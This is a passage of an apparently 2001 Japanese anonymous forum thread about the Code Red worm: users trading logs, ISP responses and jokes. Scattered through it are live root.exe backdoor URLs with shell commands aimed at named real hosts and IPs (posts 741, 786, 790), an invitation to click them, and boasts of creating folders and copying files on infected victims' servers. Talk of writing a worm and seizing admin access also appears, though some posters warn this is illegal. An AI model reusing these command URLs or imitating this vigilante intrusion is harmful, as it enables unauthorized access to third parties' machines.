- 688 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:04
- 2000のデスクトップて何処なんでしょ
¥WINNTにそれらしきディレクトリ見当たらなかったんですが
- 689 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:04
- http://mentai.2ch.net/test/read.cgi?bbs=hack&key=997233994&st=6&to=6&nofirst=true
これクリックすると不正アクセスですか?
- 690 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:06
- >>688
初心者板へGO!
- 691 :kokokara:2001/08/10(金) 00:06
- jinse.iriro.com
- 692 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:06
- 今朝 DTI のサポートに会員らしきユーザからの Code Red の
アクセスをまとめて 170 件くらい送ったのだが何の連絡もない。
と言っている間に川崎 AP からまたアクセスがあった。
何やってんだ。感染マシン晒すぞ...
- 693 :ここから来た:2001/08/10(金) 00:07
- jinse.iriro.com
いや、まぁ色々有るけどさ…。
- 694 :え〜ん:2001/08/10(金) 00:07
- >>688
ドキュメント&せっちんグのなかの各ユーザーの中
- 695 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:08
- >>688
C:\Documents and Settings\
- 696 :え〜ん:2001/08/10(金) 00:08
- >>690
そりゃかわいそう
- 697 :688:2001/08/10(金) 00:20
- どもです >694,695
今来た人はNTでは無い様で windowsしか無かったので
/c+mkdir+"c:\windows\デスクトップ\このPCはWORMに感染してます"
/c+mkdir+"c:\windows\デスクトップ\邪魔なので首吊って氏んで下さい"
としておきましたw と言うのは冗談でちゃんと丁重に書いときました
- 698 :え〜ん:2001/08/10(金) 00:22
- >>697
うわあ〜
- 699 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:24
- C:にwin98とかME、D:にNTな人だったりして。
- 700 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:26
- >>688
マジでやったの?
捕まるぞ。
- 701 :え〜ん:2001/08/10(金) 00:27
- そそCとは限らんですよね。
いざという時のためにFにしてる。
まさかFとは思わんでしょ。
- 702 :688:2001/08/10(金) 00:31
- 一応怖いので漏れ+匿名の2段串噛ませておきましたw どきどき
- 703 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:32
- >>697
いや、びっくりするけど俺だったらありがとうだな。
それ以外何もしてなければ (藁
- 704 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:33
- それは、さらに情状酌量の余地が無くなるなり。
- 705 :688:2001/08/10(金) 00:33
- ですかねw
- 706 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:34
- 今同じサーバから秒間6発来た(w
- 707 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:35
- >>688
晒しage
- 708 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:35
- 数ヵ月後に不正アクセス禁止法で逮捕者続出しそう(w
- 709 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:35
- Code Red のバックドア使って >>697 するワーム誰か作って。
一発目はネトカフェからオイラが発射したるよ。
- 710 :688:2001/08/10(金) 00:36
- 晒されるか、、今後実行しても書くのは控えようw
- 711 :え〜ん:2001/08/10(金) 00:36
- たとえば被害者ログ請求→サーバー管理者 コードレッドのログでうざいのに
そんなことしてられるかゴルァァ だと思う
- 712 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:37
- >>709
こーゆーセキュリティ診断してくれる親切ワームって見たことない
- 713 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:42
- net send localhost [messages]もいいやね。
- 714 :688:2001/08/10(金) 00:42
- WORMと言うか、ポート80で待ち受けてXXX来たら
C:\見て、"Documents and Settings"、無かったらWindows\デスクトップ
に適当に書くのなら簡単に作れそ。
うちはhttpd稼働してるから80使えんけど。
- 715 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:42
- >>713
localhost は使えなかったと思う。
- 716 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:44
- 前に穴ふさぐワーム作った人ってつかまっちゃたんだよね。
それがなけりゃこんな騒ぎとっくに終わってるような
きがするんだが。
- 717 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:47
- sageでやっても全然沈まん
- 718 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:48
- >>714
うちはhostsに書いてあるんだがこれって自分で書いただっけ
かなあ?
- 719 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:50
- >>718
舌足らずだった。
IPベースではなくNetBIOSベースなので、ちゃんとNetBIOS名でホスト名入れなければだめ。
よってlocalhostだめ。
- 720 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:50
- >>718の言ってることがよくわ
- 721 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:52
- http://***.***.***.***/コードレッドUに感染してるぞ馬鹿タレ/
って連打すればエラーログに残るかな。
近い将来やっと気付いたドアホがログ見てプルプルするの。
- 722 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:54
- 感染に気付かない様な奴はLOGの中見ずにそのまま削除 に1万ガウス
- 723 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:54
- プルプルされてもなぁ・・・
- 724 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:54
- ログを集計していて気づいたんだけど夕べ1時間に47回も同じところ
から来ていた。
で、おかしいと思ってログ全体でそのアドレスgrep|wcしたら123回も
来ていた。これって絶対変だと思うんだが新種かなあ。
それともこのアドレスの後ろにたくさんいるんだろうか?
- 725 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:58
- 3日ほど前なら1時間に100回近くアタックするところが2、3回あったよ。
- 726 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:58
- 今夜はniftyとso-netからガンガンドア叩かれてる。
- 727 :名無しさん@お腹いっぱい。:2001/08/10(金) 00:58
- C: を見て D: を見て E: を見て・・・・とやっていたら急に重くなったので
良く見ると "0 bytes Free" で AUTORUN.INF がある。
するとすぐに接続不能に…
きっと相当ビビったんだろうな(w
- 728 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:02
- あ、そういやdir a:やるとガコガコ鳴るのか(w
- 729 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:03
- >>728
を、それいい!
- 730 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:08
- >>728
ナイス!
☆★☆★☆★☆★☆★ ここまで読んだ ☆★☆★☆★☆★☆★
寝る
おやすみ、みんな
- 731 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:09
- >>728-730
やめとけ。前例あるんだぞ。
- 732 :え〜ん:2001/08/10(金) 01:13
- >>731
うまいと思ったんだけど。
■■■■ここまで読んだ■■■■
寝ます。
またね
- 733 :.m,/`.',^'n``^:2001/08/10(金) 01:17
- >>724-725
それはどんな名前よ?
イントラネット内のマシンからじゃねーか?
>>728
windowsにはejectは無いのか?(ワラ
- 734 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:18
- >>733
Macならできるのに
- 735 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:22
- アドミンに電話したらログ送れって言われたんだけど黒氷って特定のパケットだけ抽出することってできたっけ?
- 736 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:30
- 画面コピーのビットマップでもいいんじゃない。
- 737 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:31
- 霧番ゲッターに荒らされ、前スレの2がおっ勃っちまってます!!
- 738 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:38
- あれは何がしたいんだろうね。ちょっと理解出来ない。
- 739 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:39
- あぁ、分かった。このスレが本スレだと気付かず古いスレの
続きを作ってしまったのか。なんか、悪い奴ではなさそうだな。
- 740 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:46
- 1の対処法を読むと…
インターネットに繋がっててパッチ当ててなかったWindows2000のIISマシンは、
他のバックドアが入れられて、
そこから前のバックドアroot.exe, explorer.exeが消されて、
IISのログも消されて、
レジストリも他のバックドア用に変えられている
(ついでにパッチも充ててやる、ってできるのかな)可能性も考えると、
対処完璧に見えて、実はバックドアがあるマシンができちゃうって話ですよね?
だから、インターネットに繋がってるパッチ当ててなかったwindows2000のIISマシンは
すべてについて、OSを入れなおせという話ですよね??
っていう話を企業にしたら、企業はやってくれるんでしょうか。(w
- 741 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:51
- http://www.ehouse.ne.jp/Scripts/root.exe?/c+dir+"a:\"
皆様の1クリックで1企業が助かります
- 742 :すまん:2001/08/10(金) 01:54
- 感染していた。
やべ、と思って対策したんだが、数日後プロバイダから注意のメールが来てしまった。
ご迷惑おかけしました。
- 743 :名無しさん@お腹いっぱい。 :2001/08/10(金) 01:56
- >>740
そこまでの制圧はできんが、まぁOS入れ直しはやらせておきたい。
- 744 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:57
- 親切なんだか、困ったちゃんなんだか....(笑)
- 745 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:59
- >>741 やめとけって。法律読んで、判例も調べようね。
- 746 :名無しさん@お腹いっぱい。:2001/08/10(金) 01:59
- >>741
どっかにうぷしてgooにでもやってもらうか。
- 747 :名無しさん@お腹いっぱい。:2001/08/10(金) 02:02
- >>740
まぁそこらで感染させられてる奴に期待するのはどうかと思うが、
ヤラレちゃった可能性ある人はそれくらい神経質になったほうがいいと思われ。
Tripwire とか入れて、ちゃんと理解してる人ならともかく。
- 748 :名無しさん@お腹いっぱい。:2001/08/10(金) 02:02
- なるほど、サーチエンジンがクリックした場合は誰が犯人なんだろ。
ってリンク貼った奴か。
- 749 :名無しさん@お腹いっぱい。:2001/08/10(金) 02:13
- 今日は、しみじみクン来なかった… 残念。
- 750 :名無しさん@お腹いっぱい。:2001/08/10(金) 02:13
- 2chの過去ログって結構googleとかでひっかかるから
何年もにわたって >>741 が検索ロボットにクリックされ続ける
可能性もあるんかな。
- 751 :名無しさん@お腹いっぱい。:2001/08/10(金) 02:14
- >>749
惚れたな。
- 752 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:08
- >>749
アパッシュダンス丸木くんじゃだめか?
- 753 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:14
- >>735
BlackICEの最新版なら、証拠ログ残す設定にしておけば、
ICEのディレクトリに、拡張子encが出来るから、それを提出。
このファイル、NTServerか、Proにも管理ツール入れれば開くことが
できるとおもう。
- 754 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:16
- フロッピーがこがこ。マンセー!
- 755 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:20
- STARTコマンド使えば、CodeRed注意喚起のページを画面に出しておくことも出来るのかな?
- 756 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:23
- rundll使ってCD取り出しとか出来ないかな?
うぃぃぃぃん
- 757 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:26
- 何か新種のCodeRedが出てないか?
一分間に同じサーバから20発ぶち込まれたぞ。
- 758 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:31
- NがXになってるとかいう寝言じゃないよな >>757
- 759 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:32
- こっちにも来てる気がする
Xで秒間隔の連続爆撃だよな?
- 760 :757:2001/08/10(金) 03:34
- >>758
もちろんXだが、Xってアタック対象のIPに連続して送りつけるような事するの?
- 761 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:37
- 日付で攻撃パターンが変わるのでは?
- 762 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:42
- カナダから本日一通目のNが到着。
- 763 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:44
- おめでとう
- 764 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:53
- ルーターの向こう側から複数のPCが協力して連続攻撃
って可能性はあるかな。
- 765 :名無しさん@お腹いっぱい。:2001/08/10(金) 03:53
- うちは150発ぶちこまれた。
でもこういうのは、前から時々あったよ。
どさくさに紛れてなんかやってる奴居てもおかしくない。
- 766 :名無し:2001/08/10(金) 04:16
- 08/09 ステータス
合計522匹 JP53匹 TW6匹 残りは チョソ
- 767 :通行人:2001/08/10(金) 05:05
- アタックログを公開しちゃう所もでてきました・・・
ここから
http://www.hart.co.jp/spam/
- 768 :名無し:2001/08/10(金) 05:19
- 211.13.215.64 - 211.13.215.127
Natural Identity
- 769 :名無しさん@お腹いっぱい。:2001/08/10(金) 05:21
- あ、そこ知ってる。Datascope用のTCP/IPスタック出すはずが
出さずに方向転換してしまったところだ。
- 770 :名無しさん@お腹いっぱい。:2001/08/10(金) 05:32
- ┏━━━━━━━━━━━━━━━━━┓
┃ コードレッド男爵があらわれた! ┃
┗━━━━━━━━━━━━━━━━━┛
|
\/ ̄ ̄\/
/ | `皿´ ;::|
< < ̄| /;:::| ̄
\\\_/_/\
\\ |
\ \
| |\\
\ \ > >
> |/\
// / \
// / )
// /〜〜〜〜〜〜
(( (
ヽ\\
ヽ\\__
ヽ\ |
しU
- 771 :名無しさん@お腹いっぱい。:2001/08/10(金) 05:32
- ┏━━━━━━━━━━━━━━━┓
┃コードレッド男爵の放つ .┃
┃強烈なトラフィック攻撃! ┃
┗━━━━━━━━━━━━━━━┛
|
\/ ̄ ̄\/ / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
|::; `皿´ | < トトトトトトトトト、トラフィック!!
 ̄|:::;ヽ | ̄ \__________
\__\_/\
/ \
//| _ l | _
/| |/ ヽ | |/っ、、ヽ
/ \/⌒゛゛/ \/ ```
/ | / ヽ。 ヽ。
/ | | | 。 。
〜〜〜 | || | 。 。
| / | | ヽ 。 。
// | | ___
// | | /´∀`;;::\ <グワァァァァ!!重い!!
// | | / /::::::::::|
U U | ./| /:::::|::::::|
. | ||/::::::::|::::::|
- 772 :名無しさん@お腹いっぱい。:2001/08/10(金) 07:53
- 誰よ朝っぱらからこんなこと書いてんの(w (デモワラタ)
- 773 :名無しさん@お腹いっぱい。 :2001/08/10(金) 08:08
- 面白い!のであげ
- 774 :え〜ん:2001/08/10(金) 08:09
- おはよ
だれ?うまいじゃん。>>770>>771
- 775 :名無しさん@お腹いっぱい。:2001/08/10(金) 08:35
- ひさしぶりに速報版へ逝ったら、ほのぼのしちまったい。
http://kaba.2ch.net/test/read.cgi?bbs=news&key=997392520
- 776 :名無しさん@お腹いっぱい。:2001/08/10(金) 08:50
- >>770 ここで二日酔いが促進した
- 777 :名無しさん@お腹いっぱい。:2001/08/10(金) 09:13
- >>767
反スパムなんて言って自分が迷惑を被るのはイヤだけど、そのLOGを元に
他人がアタックを受けても全然平気。
所詮はその程度の会社なんだね。
- 778 :名無しさん@お腹いっぱい。:2001/08/10(金) 09:14
- ぷららユーザーからのCode Redのログを送ったら。
・全ユーザーに注意喚起します。
・送付いただいたログを元に、個別対応も行います。
と返事があった。
比較的マトモな対応。
- 779 :名無しさん@お腹いっぱい。:2001/08/10(金) 09:18
- チョソとかどうやってわかってんの?
- 780 :名無しさん@お腹いっぱい。:2001/08/10(金) 09:42
-
ログを送ったけど、dion は返事もなし。
- 781 :名無しさん@お腹いっぱい。:2001/08/10(金) 09:50
- >>767
アタックログ公開もいいけど、ドキュソのような気がする。根拠:
・8/1-5のデータをCodeRedIIと思っていそうだ。
・でかい丸が日本と勘違いしている。
・CodeRedIIが近傍アドレスにばら撒くんで、オランダではあんまり観測できないことを
判ってない。
・「PPPでサーバ立てる=わざとでは(憶測)」、とは恐れ入った(藁
いや、もうどうでもいいというか、自分も最初は勘違いしたが・・・
- 782 :名無しさん@お腹いっぱい。:2001/08/10(金) 10:14
- >>780
DION、うちは対応してもらえたみたい。
DIONスタンダードか専用線で繋がってる会社のサーバーから
Code Red来てて、管理者にメールしようにもwhoisにメアド
の記載無し。FAX入れても効果無し。
仕方ないので上流にあたるDIONにログ付きで対応を以来した。
弊社のユーザーですので弊社より警告、対応を行いますって
メールが来て、確かにその会社からはCode Redこなくなった。
対応はその時の受け付けた担当者によりけりでしょうね。
- 783 :名無しさん@お腹いっぱい。:2001/08/10(金) 10:38
- >>778 Plalaはとりあえず返事だけはマトモにくるよ。
しかもうちには同じメールに対して違う担当から2通も来た。
それはそれで別の意味で心配になるのだが…
- 784 :名無しさん@お腹いっぱい。:2001/08/10(金) 10:59
-
Hotmail が Code Red に感染
ttp://www.zdnet.co.jp/news/0108/10/b_0809_04.html
- 785 :名無しさん@お腹いっぱい。:2001/08/10(金) 11:10
- >>784
あまりにも情けなさ過ぎるぞ>Microsoft
- 786 :名無しさん@お腹いっぱい。:2001/08/10(金) 11:14
- ttp://sv1.happo-tv.co.jp/Scripts/root.exe?/c+dir+"c:\"
善意なんだろうけど、ダメなんですよね・・・
- 787 :名無しさん@お腹いっぱい。:2001/08/10(金) 11:36
- AT&Tは行き先が会員のport80宛てパケットを転送しないように
設定したみたい。今回はしかたがないのかもしれないけど、
あまりport塞がれるのはちょっとなぁ・・・ 今まで特にport塞ぐことの
なかったところだけに、ちょっと住みにくくなった感じ。
- 788 :名無しさん@お腹いっぱい。:2001/08/10(金) 11:39
- そして当方のhttpのportを変更した途端にAT&T内からのCODE RED
が・・・ 昨日やっと警告メール出したみたいだし、感染ユーザに
個別にサポートする気もないんだろ。
- 789 :>786:2001/08/10(金) 11:40
-
この状況なんだ!
それくらい、いいのでは?
いつまで経っても治まらんじゃんかよ!
へっぽこオヤヂちゅくしょーヽ(`Д´)ノ
うぜー
- 790 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:00
-
これはいいでしょ? とっても良い感じでは?
http://210.172.180.148/scripts/root.exe?/c+dir+"e:\新しいフォルダ"
- 791 :へ:2001/08/10(金) 12:03
- NTのレジスト User数より CodeREDに感染した台数の方が
多くてビルがご機嫌悪いってホント?
バックドアは便乗で使われるかもね〜
- 792 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:10
- >>791
レジストしてもろくにサポートしないんで、見限って登録しない人が多いだけでわ。
- 793 :え〜ん:2001/08/10(金) 12:24
- 次は800の人が立てるの?
- 794 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:31
- odn.ad.jp 改善の兆しが全く見られません
フロピーガコガコしてみます
- 795 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:44
- >>790
激藁タ
- 796 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:44
- >>790
シリアルナンバー集めてたよ。そこ。
- 797 :ここから来た:2001/08/10(金) 12:52
- >>790
ちゅうかワレザーじゃん。
通報しちゃえ(藁
- 798 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:54
- 「いけない女子高生」ハァハァ
- 799 :名無しさん@お腹いっぱい。:2001/08/10(金) 12:54
- interQって名前にIP入るのね。初めて知った。。。
setsuzoku-ppp-210-172-180-148.interq.or.jp
- 800 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:02
- _ __ ______________________
ノ, `'-‐┘、 || ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
く_// i ヽ || メールして 逆ギレされても ツブさない
i/ /ノ从ノ)) 〉 ./
. i.V{ fl_| |.) |/! / / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
'ヽゝ~.ー / 、/〉 < バックドア突いちゃダメ♪
/^〈不lヽ ./じ'} | マターリとね
く_ |/ヽ|. V f´ \________________
/ )/ .。i|/{. / ||
. /^Vr 〉=。||. ‐' .||
. / /〈/ .。!! ||
- 801 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:04
- >>790
チェキ!
- 802 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:07
- >800
ハイ! これからは気をつけます!
カワイイなぁ〜
- 803 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:12
- >790
うわ c:に2chのアドが!
- 804 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:14
- 「いけない女子高生」を見たいよう…。
- 805 :え〜ん:2001/08/10(金) 13:15
- 新しいの作ったよ。
http://www.nefty.net/desktop/haritsuke/imgboard.cgi
http://www.nefty.net/desktop/haritsuke/img-box/img20010810131012.gif
今度スレ立てるときマスコットにしてくれないかな。(ぼそ)
- 806 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:28
- いけなけりゃ、いかしてみよう女子高生
- 807 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:28
- n00028.max119.phs.yoyogi.mopera.ne.jp
チョトワラタ
- 808 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:29
- 女子高生のバックドアハァハァ
- 809 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:35
- >>790 の人、悲惨な事になってるね。
2001/08/10 10:50 <DIR> このサーバーはCode Redに感染し回り迷惑しています! 及びバックドアが開いております! 早急な処置を! 参照→http://ton.2ch.net/sec/index2.html (//は半角にしてね)
2001/08/10 11:01 <DIR> このサーバーはCode Redに感染し回り迷惑しています! 及びバックドアが開いております! 早急な処置を! 及び 不正なシリアルは使わない事!
2001/08/10 13:04 <DIR> 兄チャマの秘密、四葉がみ〜んな暴いちゃう!兄チャマのすべてをチェキ!!
2001/08/10 13:06 <DIR> 兄チャマの秘密、四葉がみ〜んな暴いちゃう!兄チャマのすべてをチェキ!!
色々やられてマス
- 810 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:34
- http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=3067
トレンドマイクロから自動駆除ツールがでてるみたいよ
- 811 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:37
- >>807
何が可笑しいんだ?
- 812 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:38
- >>790 はまだ気が付かんのか?家にいないのかね。
家に帰ってビックリする姿が目に浮かぶ…
- 813 :あっ、珍しい:2001/08/10(金) 13:39
- 4.23.*.*
- 814 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:41
- >>811
PHS からってことじゃない?
感染されたノートPC持ち歩いてモバイルでダイアルアップして
CodeRed ばら撒いてる、と。
- 815 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:42
- d:\inetpub\wwwroot にエロ画像(動画?)をコピーする奴は
いないだけまだましと思われ。
拡張子 .ram ってなに?
- 816 :807:2001/08/10(金) 13:43
- >>814
ソノトオリ!
- 817 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:45
- >>815
リアルプレーヤーでしょ?
- 818 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:47
- >>815
Realじゃなかったかと。
- 819 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:50
- .ramってのはストリーミングデータで本当はURLしか含まないはずだが・・・
>>790の持ってる.ramは.rmと同じっぽい。
- 820 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:52
- >>814
それはひょっとして、自動ダイアルアップで勝手に繋ぎまくり?
それともモペラって常時接続?
- 821 :ラップしてジップしってフリーズしてチンよ:2001/08/10(金) 13:54
- >>810
じゃそれをgetして、210.172.180.148にupしてexeして
- 822 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:55
- >>821
ワラタ
って、アップロードできるの?
- 823 :名無しさん@お腹いっぱい。:2001/08/10(金) 13:58
- >>820
>それともモペラって常時接続?
そんなわけない(藁
多分、本人気がつかずにパケット送りまくり。
来月のパケット料金が楽しみだ。
- 824 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:00
- >>822
しらない。(ごめん、思いつきで書いた)
けど、Adminとれたら、めんどくさそうだけど、できるよね。
さてどうやって乗っ取るか・・・
- 825 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:03
- >>824
dir 取った時点で一線を超えてるが、それ以上は止めたほうが良いと思われ。
カワイソウだから対応しようというなら Interq に言うべし。
- 826 :820:2001/08/10(金) 14:12
- >>823
うひゃぁ〜!(w
かなりすごいことになりそう。
>>822,>>824
前々スレくらいで、だれかWEBフォルダに登録できるって言ってなかった?
- 827 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:15
- >>824
ftpで、ゲット。
- 828 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:17
- 女子高生wwwrootに19番までコピーしたがあとは
- 829 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:19
- >>828 ヲイヲイ(w
WinMX で貰えよ。
- 830 :820:2001/08/10(金) 14:23
- あったあった。
http://ton.2ch.net/test/read.cgi?bbs=sec&key=997350129&st=850&to850&nofirst=true
「コード・レッド」って怖いの? の850
- 831 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:24
- お祭りのところ、大変申し訳ないが、一応Interqに警告メールを送ったよ。
無粋な奴と言われてもいいよ。
ただ、dirとったり、警告メッセージを張り付けたりする程度なら、「善意の
あらわれ」と拡大解釈出来なくもないが、ファイルをダウンロードしようと
したり、改変しようとしたら、言い訳のしようがないよ。
- 832 :820:2001/08/10(金) 14:25
- 間違えた・・・
http://ton.2ch.net/test/read.cgi?bbs=sec&key=996563662&st=850&to850&nofirst=true
- 833 :某CATVユーザー@お腹いっぱい。:2001/08/10(金) 14:26
- おもしろい記事があったので…
MSとFedExが『Code Red』ワームの餌食に
http://japan.cnet.com/News/2001/Item/010810-4.html?mn
↑
あきれてしまう記事ですね(苦笑)
- 834 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:33
- >>833
ガイシュツ
- 835 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:34
- >>830
んーと、htmlとかはechoで出力(っていうか作る)できるけどね・・・
バイナリとかのアップとかはFTPの方が楽そうだからadmin乗っ取った方が簡単かと。
- 836 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:34
- ほんとに wwwroot にコピーされてるよ…。いくらなんでもやりすぎ。
だいいち一つあたり 1.2MB ほどの動画でしょ。見ても大したことないと思う
のだが。
- 837 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:38
- ところがどっこい!!
ものすごいやつだったりして。
- 838 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:39
- dドライブのwwwrootにコピーされてるけど、cドライブのwwwrootと
どっちが機能してるの?
- 839 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:41
- このスレ、昨日警察に情報源として教えておいたから、
あんまり黒いことしないほうがいいYO!
- 840 :sage:2001/08/10(金) 14:41
- っていうか、どっちも機能してないかも
- 841 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:41
- いまちょっと http 喋ってみたけど、dドライブではないもよう。
やば、これ以上はいかんぞ、自粛。
- 842 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:47
- $ cat /var/log/httpd/access_log | grep 408
203.218.75.169 - - [07/Aug/2001:01:21:35 +0900] "-" 408 -
203.73.121.19 - - [07/Aug/2001:02:33:13 +0900] "-" 408 -
203.154.102.82 - - [07/Aug/2001:10:38:04 +0900] "-" 408 -
203.77.98.3 - - [08/Aug/2001:00:01:34 +0900] "-" 408 -
203.39.196.145 - - [08/Aug/2001:12:36:09 +0900] "-" 408 -
203.231.174.248 - - [08/Aug/2001:16:58:30 +0900] "-" 408 -
211.23.143.202 - - [08/Aug/2001:17:52:47 +0900] "-" 408 -
CodeRedの間に挟まるこれも気持ち悪い。うち、トップはTestPageのままのはずなのに。
- 843 :名無しさん@お腹いっぱい。:2001/08/10(金) 14:59
- 408ってなんだっけ?
- 844 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:01
- NNNNNNNNNの頃は良かったなぁ。IPが多彩で。
XXXXXXXXXXになってから61ばっかり(たまにNNNも来るが)
- 845 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:02
- http://www.security.nl/misc/codered-stats/geodist.gif
- 846 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:03
- 408=タイムアウト
- 847 :gt;gt;843:2001/08/10(金) 15:08
- 100 : Continue
101 : Switching Protocols
200 : OK
201 : Created
202 : Accepted
203 : Non-Authoritative Information
204 : No Content
205 : Reset Content
206 : Partial Content
300 : Multiple Choices
301 : Moved Permanently
302 : Moved Temporarily
303 : See Other
304 : Not Modified
305 : Use Proxy
400 : Bad Request
401 : Unauthorized
402 : Payment Required
403 : Forbidden
404 : Not Found
405 : Method Not Allowed
406 : Not Acceptable
407 : Proxy Authentication Required
408 : Request Time-out
409 : Conflict
410 : Gone
411 : Length Required
412 : Precondition Failed
413 : Request Entity Too Large
414 : Request-URI Too Large
415 : Unsupported Media Type
500 : Internal Server Error
501 : Not Implemented
502 : Bad Gateway
503 : Service Unavailable
504 : Gateway Time-out
505 : HTTP Version not supported
- 848 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:10
- バックドア弄ってる最中に見つかってしまった(w
- 849 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:15
- 切断されたの?
- 850 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:15
- やっと気がついたか。遅すぎじゃ…
- 851 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:16
- ん?interQの話?
まだ生きてるっぽいけど
- 852 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:16
- バックドアから侵入したりすると、捕まったりするよ。
串何重にかけたって無駄なのは知ってると思うけど。
- 853 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:19
- ワレモノ置いてるところに告訴されてもねぇ・・・
- 854 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:20
- なんだかんだで850だね。
そろそろ次のスレタイトルを考える時期かな。
コードレッド (Code Red) 鍵開いてるからって入ったら犯罪です
なんてどうだ。
- 855 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:20
- 203.241.205.228 - - [] "GET /default.ida?XXXXX
こいつ、
Server: Apache/1.3.20 (Win32) PHP/4.0.6
なのに、なぜ?
NAT の裏で別マシンが喰らってるのかな?
- 856 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:21
- >>853
アイツは泥棒なんだ、だからアイツから盗んでも泥棒には
ならないんだ。
ちょっと同意できないな。
まあ、ひと事だからどうでもいいんだけどね。
- 857 :名無しさん@お腹いっぱい。:2001/08/10(金) 15:22
- コードレッドに感染し、すぐ発見して除去しバックドア埋め込
まれる前に対策を施した。(NNNNNNNNNの頃)
その後ノートンや検査ツールでバックドアが入っていない
